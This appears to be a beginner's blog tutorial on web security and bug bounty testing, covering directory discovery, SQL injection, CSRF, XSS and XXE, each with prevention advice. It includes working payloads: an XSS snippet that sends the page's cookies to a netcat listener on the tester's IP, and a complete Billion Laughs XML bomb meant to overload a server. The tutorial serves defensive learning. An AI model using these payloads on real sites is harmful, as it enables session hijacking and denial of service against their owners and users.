Sign in Subscribe
By Hanisha Arora in Lesson Learnt from Bugs

Website Security and Bug Bounty Hunting

Website Security and Bug Bounty Hunting

Web security is one of the trending talks in the world of the Internet. There are bug hunters who try to exploit security vulnerabilities which help in gathering valuable information about your website like domain, server, your user’s information etc. Working on security is as important as SEO, content and website design.

Recently I had started researching on tests and tools used to finding vulnerabilities in websites and how to prevent the attacks to succeed. Here’s the list of what I learnt during learning on website security.

Penetration Testing

Penetration testing is to find how secure your system is. In this, the attacker tries to find vulnerabilities against your system’s infrastructure. This helps the attacker to get information, files etc that you have kept public or didn’t handle. We usually keep the backup logs of the website as a Plan B for some abrupt happening on the website. But, have you checked if the location where you have kept is secure?

Let’s Test:

Tool: Dirsearch

How to use:

  • Clone this repository and follow the instructions mentioned in it. It will give you the list of data the attacker can try to visit.
  • Now, in the links you received look for where the valuable information can be found like access.log, backup file, sql, php file and check if those can be accessed or give any kind of information to the attacker.

Prevention:

  • If any such file as mentioned above, it needs to be protected.
  • Handle the errors like 500 such that the user is unable to go out of the confined system that you have provided.
  • Do not store any sensitive information into the open access.
  • Delete all the unnecessary files and directory in the web app directory.

Injection Testing

Injection testing is done to bypass the website’s security measures. In this, the attacker tries to execute malicious SQL statements to reach the database’s server and hence gaining access to the database information if succeeded.

Let’s Test:

Tool: SQLMAP

How to use:

  • Using this will help you find the flaws in the database server with the help of the API endpoint you target.
  • This attack is at times combined with penetration attack to gain access faster.

Prevention:

  • Use a parameterized query string with which all data in the query can be safely placed.
  • Use framework functions to process data instead of using raw queries.

CSRF vulnerability

If an attacker knows the parameters being used to execute a query, he can launch CSRF attack and affect your data. It tricks by sending a malicious request. Therefore an unknown variable needs to be added that helps in validating

Let’s Test:

  • Open network tab in Chrome and observe the API calls your website makes.
  • Look for the loose endpoints in GET requests.
  • Try to replicate those by opening them in the browser or if it needs some extra information like headers use Postman.
  • If any request succeeds, you have the vulnerability!

Prevention:

  • Use POST method to send request to API
  • Use CSRF function

XSS vulnerability

An attack done on your client can also affect your system. Cross site scripting vulnerability is found by attacking on your target audience. This attack is done in 3 ways:

  • Reflected attack: In this, the attacker just observes the user to find vulnerability.
  • Stored attack: In this, some action is required by the user to gain access to some information for attack to be successful.
  • DOM attack: This is done on the basis of how your website’s DOM behaves when some change occurs.

Let’s Test:

Test 1:

  • In the input type ><xss”” and sent the request to the server to save it.
  • Now check how this piece of text gets rendered.
  • For this:
  • See what the frontend shows you when the server request is complete.
  • Now, open the view source of the page and see how that text looks like in it.
  • If there’s a difference between what is visible and what is in view source, your inputs aren’t sanitized.

Test 2:

  • In the input type <img src=x onerror=alert(1);>and sent the request to the server to save it.
  • Now once the request is complete, reload the page.
  • If the javascript alert pops up, boom!

Now you must be thinking how can such HTML or script attacks be useful? Right, to answer this try the following test.

Test 3:

  • In the terminal run nc -lvp 5555
  • Now, go back to the input and type <img src=’http://yourIP:5555/?c’+document.cookie>
  • If the attack gets successful, your admin’s document cookie is now open source and you will get the cookie in your terminal.

With this the attacker gains access to different roles of your website, to specify your admin account’s access at times.

Prevention:

  • We tend to sanitize input at the server end while inserting data to the database to prevent XSS, but we need to secure it on the way how it is visible at the frontend.
  • Use HTML entities for handling such characters so that it does not get render.

XXE vulnerability

Now, this is a vulnerability which can be easily found anywhere. This is the attack on XML. XML uses DTD(Document Type Definition) to define data. This can be external DTD or internal DTD. When XML is used to transmit data to a server, doing this attack is possible. What does this vulnerability can do:

  • It can hijack your server
  • It can make DOS attack at your system
  • It can access your server’s files from the file upload functionality

Let’s Test:

  • Let’s through an XML bomb or The Billion Laugh attack
  • Edit the XML being sent to server and add
<?xml version=”1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol “lol”>
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 “&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;”>
<!ENTITY lol2 “&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;”>
<!ENTITY lol3 “&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;”>
<!ENTITY lol4 “&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;”>
<!ENTITY lol5 “&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;”>
<!ENTITY lol6 “&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;”>
<!ENTITY lol7 “&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;”>
<!ENTITY lol8 “&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;”>
<!ENTITY lol9 “&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;”>
]>
<lolz>&lol9;</lolz>
  • In this attack the parser expands each entity within itself.
  • This will lead to increase in CPU utilization and hence bringing down your server

Prevention:

  • Disable external entities
  • Disable entity expansion in XML
  • Check for the XML libraries being used, it should not be vulnerable to XXE exploit.
  • Check for used supplied entities and inline DOC definition before parsing it.

This is just the start of handling bugs in your website. There are hundreds of vulnerabilities that exist.The more is yet to come! A successful attack can lead to massive damage to the application, but the more you try to defer it, the better you become.

If you have something more to add on, please do share!

Please note the above provided information is to help you to make your application secure and not use it in an illegal manner.

Subscribe to Haox

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
[email protected]
Subscribe